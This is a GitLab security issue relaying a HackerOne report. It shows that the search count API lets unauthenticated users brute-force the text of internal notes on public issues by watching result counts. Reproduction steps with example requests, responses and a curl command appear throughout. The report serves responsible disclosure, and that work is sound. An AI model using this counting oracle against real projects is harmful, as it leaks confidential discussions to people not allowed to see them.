  • #388242
Closed
Open
Issue created Jan 17, 2023 by GitLab SecurityBot@gitlab-securitybotReporter

Gitlab search allows leaking internal notes

HackerOne report #1829768 by shells3c on 2023-01-10, assigned to @ameyadarshan:


Report

Summary

The GitLab search count API returns the count of results obtained from internal notes even though the user has no permission to view those notes. This allows guessing/brute-forcing the internal notes.

Steps to reproduce
  1. Create a public project, then a public issue, and add an internal note with the message: Internal comment
  2. Log out and do the following tests:

https://gitlab.com/search/count?project_id=<ID>&scope=notes&search="Internal c"
{"count":"1"}

https://gitlab.com/search/count?project_id=<ID>&scope=notes&search="Internal cc"
{"count":"0"}

https://gitlab.com/search/count?project_id=<ID>&scope=notes&search="Internal co"
{"count":"1"}

https://gitlab.com/search/count?project_id=<ID>&scope=notes&search="Internal comment"
{"count":"1"}

Examples

I have created an example project for testing:

curl 'https://gitlab.com/search/count?project_id=25681831&scope=notes&search=%22CVE-2021-1234%22'
{"count":"1"}

You can confirm that the note CVE-2021-1234 exists, even though you can't see it in the GitLab search results: https://gitlab.com/search?project_id=25681831&scope=notes&search=%22CVE-2021-1234%22

Impact

Leaking internal notes of public issues
